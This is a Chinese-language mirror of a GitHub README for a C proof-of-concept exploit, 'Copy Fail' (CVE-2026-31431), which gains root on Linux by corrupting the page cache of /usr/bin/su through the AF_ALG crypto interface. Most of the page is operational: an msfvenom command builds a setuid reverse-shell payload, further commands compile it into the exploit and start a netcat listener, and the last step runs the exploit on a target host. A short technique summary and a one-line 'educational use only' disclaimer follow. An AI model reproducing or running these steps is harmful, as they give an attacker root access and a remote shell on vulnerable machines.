mCub3/CVE-2026-31431

GitHub: mCub3/CVE-2026-31431

利用Linux内核AF_ALG接口的页缓存漏洞实现无特权本地提权的C语言漏洞利用程序。

Stars: 0 | Forks: 0

# CVE-2026-31431(Copy Fail)—— C 语言 PoC 通过 `AF_ALG` 中的逻辑漏洞(内核 4.14 → 2026 年初),以写入任意可读文件页缓存中 4 个可控字节的简单方式实现无特权本地提权。 篡改内存中的 `/usr/bin/su`,然后运行它即可获得 root 权限。 ![漏洞利用截图](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/6951821b34165714.png) ## 构建与运行 ``` # 生成一个 ELF payload(reverse shell 示例) msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= PrependSetuid=true \ PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86 # 编译(static、stripped、payload 通过 .incbin 嵌入) gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c # 先启动 listener(nc -lvp ),然后在目标主机上运行 exploit ./copy_fail_x86 ``` ## 关键细节 • CVE:CVE-2026-31431 • CVSS:7.8 • 修复:commit [a664bf3d603d](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a664bf3d603d) • 适用于 2017–2026 年间几乎所有 Linux 发行版(容器也可)。 • 技术手段:以 O_RDONLY 方式打开 /usr/bin/su,利用 AEAD 就地解密将精心构造的 payload 直接注入页缓存,绕过 VFS。 • 原始披露与 732 字节 Python PoC → [https://copy.fail](https://copy.fail) ## 许可证 MIT——参见 [LICENSE](LICENSE)。 仅限教育目的或授权测试使用。使用风险自负。
标签:0day挖掘, AEAD, AF_ALG, CVE-2026-31431, Linux内核, Linux提权, LPE, PoC, Root权限, VFS绕过, Web报告查看器, 内存损坏, 内核安全, 内核漏洞, 加密API, 协议分析, 安全渗透, 客户端加密, 恶意代码, 暴力破解, 本地提权, 权限提升, 竞态条件, 页面缓存